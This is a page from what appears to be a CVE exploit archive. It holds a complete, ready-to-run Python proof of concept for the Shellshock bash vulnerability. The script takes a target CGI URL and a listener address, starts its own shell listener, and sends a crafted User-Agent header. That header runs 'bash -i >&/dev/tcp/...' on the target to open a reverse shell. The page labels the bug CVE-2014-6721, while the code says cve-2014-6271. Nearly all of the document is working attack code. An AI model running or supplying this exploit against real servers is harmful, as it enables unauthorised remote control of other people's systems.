4837 Total CVEs
26 Years
GitHub
Home / 2014 / CVE-2014-6721
README.md
Rendering markdown...
POC / CVE-2014-6721-POC.py PY
⬇ Raw GitHub ✕ Close 
import requests
import socket
import argparse
import subprocess
import sys
from requests import get
from requests.exceptions import ChunkedEncodingError
import threading
from time import sleep

# CVE-2014-6721 - Shellshock POC exploit
# In this code, we are doing few things. First, we are recieving the required arguments from the user, 
# including the target url of the vulnerable cgi script, and the listening ip address and port for  
# capturing the reverse shell.Then, we create a listening socket that will function as the actual reverse shell in the program.
# After that, we are sending a GET request with specially crafted User-Agent Header, that will cause a RCE in the server,
# and will send the connection back to our listening socket, as a reverse shell.


# Receiving required arguments from the user:
def GetArguments():
    parser = argparse.ArgumentParser(description="Shellshock Vulnerability exploit (cve-2014-6271)")
    required=parser.add_argument_group("required arguments")
    required.add_argument('-u',"--url", type=str, help='target url of cgi script (example: http://www.domain.com/cgi-bin/script.cgi)'
    ,required=True)
    required.add_argument('-l','--lhost', type=str, help='listening ip address for capturing the reverse shell',required=True)
    required.add_argument('-p',"--port", type=int, help='listening port for capturing the reverse shell',required=True)
    args= parser.parse_args()
    return args.url, args.lhost,args.port

# Creating the lisetning socket that will function later as the reverse shell:
def reverse_shell():
    try:
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.bind((lhost,port))
        s.listen(1)
        print("[*] listening on port: {0}...".format(port))
        conn,addr = s.accept()
        print("[*] received connection from {0}".format(addr))
        while True:
            output=conn.recv(2048).decode()
            sys.stdout.write(output)
            cmd=input()+"\n"
            if(cmd=="exit"):
                conn.close()
                s.close()
                break
            conn.send(cmd.encode())
            sleep(1)
            sys.stdout.write("\033[A"+output.split("\n")[-1])
            
    except KeyboardInterrupt:
        conn.close()
        s.close()
        quit()
  
#calling the functions "GetArguements" and "reverse shell",and after
#that sending the crafted GET request with crafted User-Agent Header:       
try:
    url,lhost,port = GetArguments()
    t = threading.Thread(target=reverse_shell, args=())
    t.start()
    sleep(2)
    #this is the part of crafting and sending the GET request:
    cmd="'bash -i >&/dev/tcp/{0}/{1} 0>&1'".format(lhost,port)
    user_agent= {"User-Agent":"() { :; };echo; echo; /bin/bash -c "+cmd}
    request=requests.get(url,headers=user_agent)
except ChunkedEncodingError:
    pass
except KeyboardInterrupt:
    quit()